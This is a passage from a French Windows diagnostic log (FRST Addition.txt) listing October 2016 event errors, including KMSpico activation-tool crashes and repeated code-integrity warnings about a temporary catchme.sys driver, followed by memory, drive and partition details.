Chemin d’accès de l’application défaillante : C:\Program Files\KMSpico\Service_KMS.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : 1de512b8-645c-4917-87c8-362fc0938487
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Error: (10/26/2016 12:16:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2147023170 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/18/2016 08:39:53 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.
System Error:
Accès refusé.
.
Error: (10/18/2016 04:29:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante AutoPico.exe, version : 12.2.0.0, horodatage : 0x53a73867
Nom du module défaillant : KERNELBASE.dll, version : 10.0.10586.306, horodatage : 0x571af331
Code d’exception : 0xe0434352
Décalage d’erreur : 0x0000000000071f28
ID du processus défaillant : 0x1354
Heure de début de l’application défaillante : 0x01d229545959aa5a
Chemin d’accès de l’application défaillante : C:\Program Files\KMSpico\AutoPico.exe
Chemin d’accès du module défaillant: C:\WINDOWS\system32\KERNELBASE.dll
ID de rapport : 93a82595-2c1e-488b-b3e0-439500baaaed
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Erreurs système:
=============
Error: (10/30/2016 01:13:42 PM) (Source: DCOM) (EventID: 10010) (User: VAIO-VPC)
Description: Le serveur App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (10/30/2016 01:11:43 PM) (Source: DCOM) (EventID: 10010) (User: VAIO-VPC)
Description: Le serveur App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (10/28/2016 11:26:43 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:43 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:42 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:42 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:26 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:26 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:17 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:17 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
CodeIntegrity:
===================================
Date: 2016-10-28 12:26:43.133
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:43.100
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:42.758
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:42.714
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:26.940
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:26.909
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:17.060
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:17.029
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:16.649
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:16.618
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i3 CPU M 380 @ 2.53GHz
Pourcentage de mémoire utilisée: 48%
Mémoire physique - RAM - totale: 2798.09 MB
Mémoire physique - RAM - disponible: 1452.81 MB
Mémoire virtuelle totale: 5614.09 MB
Mémoire virtuelle disponible: 4218.83 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:297.55 GB) (Free:233.19 GB) NTFS
Drive e: (DISQUE LULU) (Fixed) (Total:298.02 GB) (Free:26.86 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 51BF1D92)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (Size: 298.1 GB) (Disk ID: 77850B07)
Partition 1: (Not Active) - (Size=298.1 GB) - (Type=0B)
==================== Fin de Addition.txt ============================